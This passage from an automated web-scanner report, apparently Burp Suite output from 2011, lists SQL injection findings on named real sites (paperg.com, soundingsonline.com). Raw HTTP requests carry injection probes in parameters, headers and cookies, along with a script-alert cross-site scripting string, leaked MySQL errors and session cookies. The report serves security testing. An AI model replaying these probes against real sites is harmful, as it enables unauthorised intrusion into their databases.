Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:09 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3370
Connection: close
Via: 1.1 AN-0016020122637050

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />

   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />

   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   
   

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }
   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   
   <div id="background_bar_container">
       <div id="background_bar"> </div>
   </div>
   


   <div id="body-wrap">
       
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>
       

        
    <div id="set1">
       NY Daily News Flyerboard     </div>
    

           
           <div id="content">



               <div style="text-align: center; margin: 10px;">



            <s
...[SNIP]...

Request 2

GET /flyerboard/soundings-publications-llc/212367864195%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response 2

1.129. https://www.paperg.com/post.php [bid parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The bid parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the bid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /post.php?bid=2123%20and%201%3d1--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response 1

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:05:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>

       <meta http-equiv="Content-Type" co
...[SNIP]...
<img id="temp4_norm" src="img/temp4.jpg" onclick="hide('temp4_norm');show('temp4_over');switch_cat(4);" style="float:left;padding:5px;cursor:pointer;visibility:hidden;" />
                       <img id="temp4_over" src="img/temp4_over.jpg" style="display:none;float:left;padding:5px;cursor:pointer;visibility:hidden;" />
                   </span>
                                       <span onmouseover="display_template_info(5);" onmouseout="display_template_info(0);">
                       <img id="temp5_norm" src="img/temp5.jpg" onclick="hide('temp5_norm');show('temp5_over');switch_cat(5);" style="float:left;padding:5px;cursor:pointer;visibility:hidden;" />
                       <img id="temp5_over" src="img/temp5_over.jpg" style="display:none;float:left;padding:5px;cursor:pointer;visibility:hidden;" />
                   </span>

               <div style="display:none;">
               <select name="loc_cat" id="loc_cat" size="1" class="post"
                   onChange="changeCategory( parseInt( document.getElementById( 'loc_cat' ).value ) );saveInput( this.getAttribute( 'name' ) );">
                               <option value="3" selected>General</option>
           <script type="text/javascript">
           var selected_cat = document.getElementById("temp3_norm");
           if(selected_cat)
           {
               setTimeout("selected_cat.onclick();", 2000);
           }
           </script>
                           <option value="4">Real Estate</option>
                           <option value="5">Promotion</option>
                           </select>
               </div>
               <script>
               var selected_template = 0;
               function switch_cat(value)
               {
                   selected_template = value;
                   //hide other values
                   var i;
                   for(i = 3; i <= 5; i++)
                   {
                       if(i == selected_template)
                       {
                           hide('temp' + i + '_norm');
                           show('temp' + i + '_over');
                       }
                       else
                       {
                           hide('temp' + i + '_over');
                           show('temp' + i + '_norm');
                       }
                   }

                   var cat_node = document.getElementById('loc_cat');
                   cat_node.value = value;
                   cat_node.onchange();
               }

               function display_template_info(cat_id)
               {
                   var text = '';
                   switch(cat_id)
                   {
                   case 3:
                       text = 'The most versatile template. Allows you to include text like address, phone, and URL.';
                       break
...[SNIP]...

Request 2

GET /post.php?bid=2123%20and%201%3d2--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response 2

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:05:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>

       <meta http-equiv="Content-Type" co
...[SNIP]...
<img id="temp4_norm" src="img/temp4.jpg" onclick="hide('temp4_norm');show('temp4_over');switch_cat(4);" style="float:left;padding:5px;cursor:pointer;" />
                       <img id="temp4_over" src="img/temp4_over.jpg" style="display:none;float:left;padding:5px;cursor:pointer;" />
                   </span>
                                       <span onmouseover="display_template_info(5);" onmouseout="display_template_info(0);">
                       <img id="temp5_norm" src="img/temp5.jpg" onclick="hide('temp5_norm');show('temp5_over');switch_cat(5);" style="float:left;padding:5px;cursor:pointer;" />
                       <img id="temp5_over" src="img/temp5_over.jpg" style="display:none;float:left;padding:5px;cursor:pointer;" />
                   </span>

               <div style="display:none;">
               <select name="loc_cat" id="loc_cat" size="1" class="post"
                   onChange="changeCategory( parseInt( document.getElementById( 'loc_cat' ).value ) );saveInput( this.getAttribute( 'name' ) );">
                               <option value="3" selected>General</option>
           <script type="text/javascript">
           var selected_cat = document.getElementById("temp3_norm");
           if(selected_cat)
           {
               setTimeout("selected_cat.onclick();", 2000);
           }
           </script>
                           <option value="4">Real Estate</option>
                           <option value="5">Promotion</option>
                           </select>
               </div>
               <script>
               var selected_template = 0;
               function switch_cat(value)
               {
                   selected_template = value;
                   //hide other values
                   var i;
                   for(i = 3; i <= 5; i++)
                   {
                       if(i == selected_template)
                       {
                           hide('temp' + i + '_norm');
                           show('temp' + i + '_over');
                       }
                       else
                       {
                           hide('temp' + i + '_over');
                           show('temp' + i + '_norm');
                       }
                   }

                   var cat_node = document.getElementById('loc_cat');
                   cat_node.value = value;
                   cat_node.onchange();
               }

               function display_template_info(cat_id)
               {
                   var text = '';
                   switch(cat_id)
                   {
                   case 3:
                       text = 'The most versatile template. Allows you to include text like address, phone, and URL.';
                       break;
                   case 4:
                       text = 'Use for real estate listings. Allows you
...[SNIP]...

1.130. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=hhaihbhl84hkvcra7pfqf1cd13; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.131. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/about-us

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /about-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.132. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/advertise

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /advertise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /advertise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.133. http://www.soundingsonline.com/archives ['"--> parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The '"--></style></script><script>alert(0x001E2B)</script> parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '"--></style></script><script>alert(0x001E2B)</script> parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>' HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2autr3bra1c4n8hi6pofo0fot1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"-->
...[SNIP]...

1.134. http://www.soundingsonline.com/archives ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E'' AND cooki' at line 1</font>
...[SNIP]...

1.135. http://www.soundingsonline.com/archives [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=90plqvgiq64ahge1urijnrrll5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"-->
...[SNIP]...

Request 2

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)''
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.136. http://www.soundingsonline.com/archives [d4dad6935f632ac35975e3001dc7bbe8 cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1'; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=f953kv0sgtapd396agsosf0ie5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' AND cookie' at line 1</font>
...[SNIP]...

Request 2

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1''; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.137. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
